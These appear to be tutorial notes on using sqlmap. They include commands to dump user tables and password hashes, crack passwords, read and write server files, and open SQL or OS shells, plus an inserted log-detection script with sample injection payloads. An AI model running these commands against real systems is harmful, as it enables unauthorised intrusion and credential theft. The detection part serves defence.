-u "(URL)"
1. Determine which parameters are injectable.
2. Determine which SQL injection technique can be used.
3. Identify the database type.
4. Read data according to the user's choices.
sqlmap supports five different injection modes:
1. Boolean-based blind: true and false conditions can be told apart from the returned page.
2. Time-based blind: nothing can be determined from the page content, so a conditional statement with a time delay is used and the result is judged by whether the delay was executed (that is, whether the page response time increased).
3. Error-based: the page returns error messages, or the result of the injected statement is returned directly in the page.
4. UNION query injection: applicable where UNION can be used.
5. Stacked queries injection: applicable where multiple statements can be executed at the same time.
If injection is supported, sqlmap shows which type of injection is present.
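Seen from the defending side, the five modes listed above leave different traces in web server access logs. The following is an added example, not part of the original notes or of sqlmap itself: it labels logged request targets by mode. The signatures are assumed heuristics and not exhaustive, and the log lines, IP addresses and paths are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Heuristic signatures, one per injection mode listed above (assumed, not exhaustive).
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time-blind": re.compile(r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.I),
    "error-based": re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML)\s*\(|FLOOR\s*\(\s*RAND\s*\(", re.I),
    "union-query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "stacked-queries": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP|EXEC)\b", re.I),
}

# Client IP and request target from a combined-format access log entry.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the sorted mode labels whose signature matches the URL-decoded target."""
    decoded = unquote_plus(target)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan(lines):
    """Map client IP -> set of modes seen across all of its requests."""
    hits = {}
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not an access log entry in the expected format
        labels = classify(m.group(2))
        if labels:
            hits.setdefault(m.group(1), set()).update(labels)
    return hits

# Constructed sample log lines (documentation IP ranges, hypothetical path).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1%20AND%205=5 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1;SELECT%20PG_SLEEP(5) HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, modes in scan(SAMPLE_LOG).items():
        print(ip, sorted(modes))
```

One client cycling through several modes against the same parameter within seconds, as 203.0.113.9 does in the sample, is a stronger signal of an automated scan than any single match.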
If you know the database type, you can specify it:
--dbms=mysql (or Oracle, MSSQL, etc.)
Then check whether the current user is a DBA:
sqlmap -u "url" --is-dba
With DBA-level privileges, it may be possible to execute commands or upload a shell.
Take a look at the current user name:
sqlmap -u "url" --current-user
Check which databases exist:
sqlmap -u "url" --dbs
If the privileges are high enough, you can query across databases.
Look at the database currently in use:
sqlmap -u "url" --current-db
Check the table names of this database:
sqlmap -u "url" -D database --tables
The table that stores user names and passwords may be named admin, password, User, Admin_user, system, manage, member, etc.
Look at the column names:
sqlmap -u "url" -D database -T table --columns
Look at the data:
sqlmap -u "url" -D database -T table -C username,password --dump
The above covers basic usage.
We can see which users exist in the database:
sqlmap -u "url" --users
You can view the passwords of the database users:
sqlmap -u "url" --passwords
You can choose to save the hashes and crack the passwords with an external program,
or choose the bundled dictionary, or a dictionary in another directory, and let sqlmap crack the passwords.
You can view the user's privileges (which commands can be executed):
sqlmap -u "url" --privileges
Look at the schema of the database:
sqlmap -u "url" --schema --batch --exclude-sysdbs
-v  Verbosity of the displayed information, 7 levels
0  only Python errors and critical messages are displayed
1  also display basic information and warning messages (default)
2  also display debug information
3  also display the injected payloads
4  also display the HTTP requests
5  also display the HTTP response headers
6  also display the HTTP response page content
The test statements can be found in xml\payloads.xml and studied there.
-m  Use a file containing a list of URLs
Parameter --common-tables
You can use this parameter when the database tables cannot be obtained with --tables.
It applies under the following conditions:
The MySQL version is lower than 5.0, which has no INFORMATION_SCHEMA table.
The database is Microsoft Access and the system table msysobjects is unreadable (the default).
The current user does not have permission to read the system tables that hold the data structure.
The table names tried by brute force are in /txt/common-tables.txt; you can add your own.
--common-columns  Same as above, for column names.
Cookie injection
sqlmap -u "cookie.sql.com/test.php" --cookie "id=11" --level 2
The parameter from the URL is moved into the cookie parameter; the level must be at least 2.
The HTTP cookie is tested at level 2, and the HTTP User-Agent/Referer headers are tested at level 3.
POST form
sqlmap -u "url" --forms
sqlmap -u "url" --data "username=123&password=123" (the POST data can be obtained with HackBar)
Request delay: requests that are sent too fast may be blocked
--delay=5
File operations
Read and write
--file-read=""
--file-write=""
Command execution
SQL
--sql-query="statement"
--sql-shell  returns a SQL shell
System command execution
--os-cmd
--os-shell
--tamper  Load tamper scripts
sqlmap: simple usage workflow